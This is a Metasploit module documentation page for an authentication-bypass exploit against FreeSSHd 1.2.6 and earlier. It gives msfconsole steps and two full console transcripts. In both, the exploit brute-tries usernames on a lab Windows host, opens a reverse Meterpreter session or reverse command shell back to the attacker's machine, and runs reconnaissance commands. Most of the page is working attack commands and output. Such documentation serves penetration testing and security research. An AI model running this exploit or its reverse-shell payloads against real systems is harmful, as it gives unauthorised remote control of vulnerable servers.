adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md
T
Imran E. Dawoodjee 0edd3a9138 Fixed numbering error in documentation.
2018-11-16 21:34:05 +08:00

93 lines
3.3 KiB
Markdown
Raw Blame History

## Description
This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.
## Verification
1. Start msfconsole
2. Do : `use exploit/windows/ssh/freesshd_authbypass`
3. Do : `set RHOST [target IP]`
4. Do : `set PAYLOAD [valid windows payload]` if you want to use other payloads (`windows/meterpreter/reverse_tcp` by default)
5. Do : `set LHOST [Your IP]`
6. Do : `set LPORT [valid port]` (port is `4444` by default)
7. Do : `exploit`
8. If target is vulnerable, a shell (`meterpreter` by default) should pop
## Example with default payload (windows/meterpreter/reverse_tcp)
```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > exploit
[*] Started reverse TCP handler on 192.168.80.138:4444
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Sending stage (179779 bytes) to 192.168.80.131
[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800
meterpreter > sysinfo
Computer : SSH-TEST-SERVER
OS : Windows 8.1 (Build 9600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```
## Example with plain old reverse shell (windows/shell_reverse_tcp)
```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
LPORT => 4444
msf exploit(windows/ssh/freesshd_authbypass) > exploit
[*] Started reverse TCP handler on 192.168.80.138:4444
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
IPv4 Address. . . . . . . . . . . : 192.168.80.131
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : localdomain
C:\Windows\system32>hostname
hostname
SSH-TEST-SERVER
C:\Windows\system32>
```
Reference in New Issue View Git Blame Copy Permalink